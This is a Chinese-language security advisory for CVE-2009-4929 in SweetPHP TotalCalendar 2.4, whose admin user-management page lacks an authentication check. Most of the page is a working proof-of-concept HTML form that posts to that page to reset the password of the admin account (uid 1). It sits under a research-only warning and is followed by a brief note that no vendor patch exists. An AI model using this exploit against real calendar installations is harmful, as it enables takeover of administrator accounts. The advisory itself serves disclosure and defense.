受影响系统:
SweetPHP TotalCalendar 2.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 34619
CVE ID: CVE-2009-4929
TotalCalendar是一种基于Web的日程管理系统。
TotalCalendar的admin/manage_users.php页面没有强制管理认证,远程用户可以通过在HTTP请求中包含newPW1和newPW2参数任意更改口令。
<*来源:ThE g0bL!N
链接:http://secunia.com/advisories/34824
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<title> Powered by: TotalCalendar 2.4 Remote Password Change </title>
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="padding: 0px;">
<table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
<tr>
<td height="100%" style="padding: 0px;">
<div align="left" id="25_content_area" style="">
<script language="javascript">
// Should we show the pw changing fields or not
function pwChanger(bool)
{
if(bool)
{
// Show password changer
document.getElementById('pwChange').style.display = "none";
document.getElementById('pwDontChange').style.display = "";
document.getElementById('pwChangerArea').style.display = "";
document.getElementById('changePW').value = 1;
}
else
{
// Hide password changer
document.getElementById('pwChange').style.display = "";
document.getElementById('pwDontChange').style.display = "none";
document.getElementById('pwChangerArea').style.display = "none";
document.getElementById('changePW').value = 0;
}
}
</script>
<br /<br /><br /><form method="POST" action="http://www.example.com/calendar/admin/manage_users.php"><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
<table align="center">
<tr>
<td align="right" valign="top"><b>First Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Last Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td align="right" valign="top"><b>Username:</b></td>
<td> </td>
<td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Email Address:</b></td>
<td> </td>
<td align="left" valign="top"><input name="email" value="x0q@hotmail.fr" size="40" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChange">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
</tr>
<tr id="pwDontChange" style="display: none;">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChangerArea" style="display: none;">
<td colspan="3">
<table width="100%">
<tr>
<td align="right" valign="top"><b>New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Confirm New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
</tr>
</table></form><br /></div></td>
建议:
--------------------------------------------------------------------------------
厂商补丁:
SweetPHP
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sweetphp.com/nuke/modules.php?name=Script_Preview&script=12
[课程]Linux pwn 探索篇!